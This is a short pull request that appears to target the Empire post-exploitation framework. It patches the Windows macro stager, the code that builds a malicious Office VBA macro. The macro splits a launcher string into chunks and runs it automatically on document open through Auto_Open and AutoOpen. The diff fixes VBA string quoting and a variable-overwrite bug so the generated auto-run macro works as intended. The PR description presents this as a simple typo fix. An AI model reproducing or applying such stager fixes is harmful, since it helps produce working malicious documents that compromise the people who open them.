### PR TITLE
Fix macro launcher

### DIFF
--- a/lib/stagers/windows/macro.py
+++ b/lib/stagers/windows/macro.py
@@ -106,9 +106,9 @@ class Stager:
         else:
             chunks = list(helpers.chunks(launcher.replace("'", "\\'"), 50))
             payload = "\tDim "+Str+" As String\n"
-            payload += "\t"+Str+" = '" + str(chunks[0]) + "'\n"
+            payload += "\t"+Str+" = \"" + str(chunks[0]) + "\"\n"
             for chunk in chunks[1:]:
-                payload += "\t"+Str+" = "+Str+" + '" + str(chunk) + "'\n"
+                payload += "\t"+Str+" = "+Str+" + \"" + str(chunk) + "\"\n"
 
             macro = "Sub Auto_Open()\n"
             macro += "\t"+Method+"\n"

--- a/lib/stagers/windows/macro.py
+++ b/lib/stagers/windows/macro.py
@@ -113,7 +113,7 @@ class Stager:
             macro = "Sub Auto_Open()\n"
             macro += "\t"+Method+"\n"
             macro += "End Sub\n\n"
-            macro = "Sub AutoOpen()\n"
+            macro += "Sub AutoOpen()\n"
             macro += "\t"+Method+"\n"
             macro += "End Sub\n\n"
 


### PR DESCRIPTION
Hi!

This PR fixes a typo in the macro stager (avoid the overwriting of the `macro` variable).

EDIT : I also fix quotes, [similar to this fix](https://github.com/EmpireProject/Empire/pull/674/commits/f6afafe40ffa81d135998598ccb239c497db4888)

TPWSOS :sunflower: 